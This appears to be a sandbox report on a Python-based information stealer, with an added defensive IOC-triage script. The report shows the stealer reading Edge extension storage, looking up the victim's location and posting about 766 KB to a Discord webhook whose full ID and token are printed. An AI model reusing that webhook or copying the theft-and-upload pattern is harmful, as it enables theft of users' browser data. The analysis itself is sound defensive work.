              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000053.00000000.2004144713.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdb source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000001.00000002.2122070037.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000001.00000002.2121630063.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, 00000001.00000002.2121042650.00007FFE11EA1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000001.00000002.2121890288.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000001.00000002.2122536379.00007FFE13301000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, 00000001.00000002.2122251570.00007FFE13201000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120647097.00007FFE0EB41000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000001.00000002.2120375422.00007FFE0E15E000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\program.exe; Code function: 0_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
              Source: C:\Users\user\Desktop\program.exe; Code function: 0_2_00007FF6B7509280 FindFirstFileExW,FindClose
              Source: C:\Users\user\Desktop\program.exe; Code function: 0_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\program.exe; Code function: 1_2_00007FF6B7509280 FindFirstFileExW,FindClose
              Source: C:\Users\user\Desktop\program.exe; Code function: 1_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\program.exe; Code function: 1_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe; Code function: 83_2_00007FF64FE746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe; Code function: 83_2_00007FF64FEB88E0 FindFirstFileExA
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe; Code function: 83_2_00007FF64FE6E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Users\user\Desktop\program.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\
              Source: C:\Users\user\Desktop\program.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\
              Source: C:\Users\user\Desktop\program.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\
              Source: C:\Users\user\Desktop\program.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\
              Source: C:\Users\user\Desktop\program.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\
              Source: C:\Users\user\Desktop\program.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\
              Source: Joe Sandbox View; IP Address: 208.95.112.1
              Source: unknown; DNS query: name: ip-api.com
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic; HTTP traffic detected:
                  GET /json/?fields=225545 HTTP/1.1
                  Host: ip-api.com
                  Accept-Encoding: identity
                  User-Agent: python-urllib3/2.2.3
              Source: global traffic; DNS traffic detected: DNS query: ip-api.com
              Source: global traffic; DNS traffic detected: DNS query: discord.com
              Source: unknown; HTTP traffic detected:
                  POST /api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM HTTP/1.1
                  Host: discord.com
                  Accept-Encoding: identity
                  Content-Length: 766741
                  User-Agent: python-urllib3/2.2.3
                  Content-Type: multipart/form-data; boundary=759108746665450e003c83e6b292e39f
              Source: global traffic; HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Sun, 17 Nov 2024 10:22:43 GMT
                  Content-Type: application/json
                  Content-Length: 45
                  Connection: close
                  Cache-Control: public, max-age=3600, s-maxage=3600
                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                  x-ratelimit-limit: 5
                  x-ratelimit-remaining: 4
                  x-ratelimit-reset: 1731838964
                  x-ratelimit-reset-after: 1
                  via: 1.1 google
                  alt-svc: h3=":443"; ma=86400
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kw%2FMCC3nxYl1Sb3abNC0WpO%2FFrUHsOgYiaVPTDATc2ZXBunk234OqISsKrlIBESZZz3Fw35sEraQjNMdFhDGCmXh9SjSXz4cgxjnZha1bFkdj228QxWzxWkoww2m"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  X-Content-Type-Options: nosniff
                  Set-Cookie: __cfruid=7f3eb00f74a25652e1281dc04aa6cdbfe83e4455-1731838963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                  Set-Cookie: _cfuvid=ffpl7Z_XRbw2jJzUSb94O3lzwZOtlB08ocIN8D03Ggs-1731838963322-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8e3f004c2e334678-DFW
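              The captured exchange (an ip-api.com geolocation lookup, then a 766741-byte multipart POST to a Discord webhook answered with 404, which is what Discord returns for a deleted or unknown webhook, so the channel was already dead at analysis time) and the extracted configuration can be triaged together, and the DigiCert, Comodo, Sectigo and Thawte URLs the report lists among the binary strings need to be kept apart from them: those are CRL and AIA URLs from the Authenticode chains of the bundled Python .pyd modules and libffi-8.dll, not attacker infrastructure. The following is an added example, not part of the Joe Sandbox output; the HTTP text and URLs are transcribed from the report with CRLF line endings restored and the response headers abridged, and the IOC kinds and the host list are the author's own choices.

```python
"""IOC triage for the network artefacts in this report.  Added example, not
sandbox output.  HTTP heads and URLs are transcribed from the report (response
headers abridged, CRLF restored); IOC kinds and the host list are assumptions."""
import json
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

DISCORD_WEBHOOK = re.compile(r"^/api/webhooks/(\d+)/([A-Za-z0-9_-]+)$")
# Hosts that occur in the memory strings only as CRL/AIA URLs from the code-signing
# chains of the bundled Python modules and libffi-8.dll; extend as needed.
CERT_INFRA_HOSTS = {"cacerts.digicert.com", "crl3.digicert.com",
                    "crl.comodoca.com", "crl.sectigo.com", "crl.thawte.com"}


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)  # lowercased name -> list of values

    def header(self, name: str) -> Optional[str]:
        values = self.headers.get(name.lower())
        return values[0] if values else None


def parse_http(raw: str) -> HttpMessage:
    """Parse a request or response head (start line plus headers; body ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    msg = HttpMessage(start)
    for line in lines:
        name, _, value = line.partition(":")
        if name:
            msg.headers.setdefault(name.strip().lower(), []).append(value.strip())
    return msg


@dataclass
class Ioc:
    kind: str
    value: str
    note: str = ""


def request_iocs(req: HttpMessage) -> list:
    """Destination host, grabber-specific endpoints and the client User-Agent of one request."""
    method, path, _ = req.start_line.split(" ", 2)
    host = req.header("host") or ""
    iocs = [Ioc("host", host)]
    m = DISCORD_WEBHOOK.match(path)
    if m and method == "POST":
        size = int(req.header("content-length") or 0)
        ctype = (req.header("content-type") or "?").split(";")[0]
        iocs.append(Ioc("discord_webhook", f"{m.group(1)}/{m.group(2)}",
                        f"{size} bytes uploaded as {ctype}"))
    if host == "ip-api.com":
        iocs.append(Ioc("geoip_lookup", host + path, "victim geolocation before exfiltration"))
    ua = req.header("user-agent")
    if ua and not ua.startswith("Mozilla/"):
        iocs.append(Ioc("user_agent", ua, "scripted client, not a browser"))
    return iocs


def webhook_alive(resp: HttpMessage) -> bool:
    """Discord answers 404 for a deleted or unknown webhook; anything else means it still accepts data."""
    return resp.start_line.split(" ")[1] != "404"


def config_matches_traffic(config_json: str, req: HttpMessage) -> bool:
    """Does the C2 URL from the configuration extractor match the POST actually observed?"""
    url = urlsplit(json.loads(config_json)["C2 url"])
    return url.hostname == req.header("host") and url.path == req.start_line.split(" ")[1]


def classify_url(url: str) -> str:
    host = (urlsplit(url).hostname or "").lower()
    return "cert_infrastructure" if host in CERT_INFRA_HOSTS else "network_ioc"


GEOIP_REQUEST = ("GET /json/?fields=225545 HTTP/1.1\r\nHost: ip-api.com\r\n"
                 "Accept-Encoding: identity\r\nUser-Agent: python-urllib3/2.2.3\r\n\r\n")
WEBHOOK_PATH = ("/api/webhooks/1298867906041479188/"
                "X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM")
EXFIL_REQUEST = (f"POST {WEBHOOK_PATH} HTTP/1.1\r\nHost: discord.com\r\nAccept-Encoding: identity\r\n"
                 "Content-Length: 766741\r\nUser-Agent: python-urllib3/2.2.3\r\n"
                 "Content-Type: multipart/form-data; boundary=759108746665450e003c83e6b292e39f\r\n\r\n")
EXFIL_RESPONSE = ("HTTP/1.1 404 Not Found\r\nDate: Sun, 17 Nov 2024 10:22:43 GMT\r\n"
                  "Content-Type: application/json\r\nContent-Length: 45\r\n"
                  "x-ratelimit-limit: 5\r\nx-ratelimit-remaining: 4\r\nServer: cloudflare\r\n\r\n")
CONFIG = json.dumps({"C2 url": "https://discord.com" + WEBHOOK_PATH})
MEMORY_URLS = [
    "http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt",
    "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl",
    "http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl",
    "https://discord.com" + WEBHOOK_PATH,
]

if __name__ == "__main__":
    req = parse_http(EXFIL_REQUEST)
    for ioc in request_iocs(parse_http(GEOIP_REQUEST)) + request_iocs(req):
        print(f"{ioc.kind:16} {ioc.value}  {ioc.note}")
    print("webhook alive:", webhook_alive(parse_http(EXFIL_RESPONSE)),
          "| config matches traffic:", config_matches_traffic(CONFIG, req))
    for url in MEMORY_URLS:
        print(f"{classify_url(url):20} {url}")
```

              The webhook ID and token are the actionable indicator (report them to Discord for takedown and block the full path at the proxy; blocking discord.com outright is rarely acceptable), while the python-urllib3 User-Agent on both requests is a cheap proxy-side signal that a script, not a browser, is talking to these hosts.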
              Source: program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digi
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: program.exe, 00000001.00000003.1851814782.000001B5FE386000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2109732740.000001B5FEE1E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103020652.000001B5FEE1E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002700653.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3B0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104079256.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 
00000001.00000003.1852643951.000001B5FE39C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1852439273.000001B5FE38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
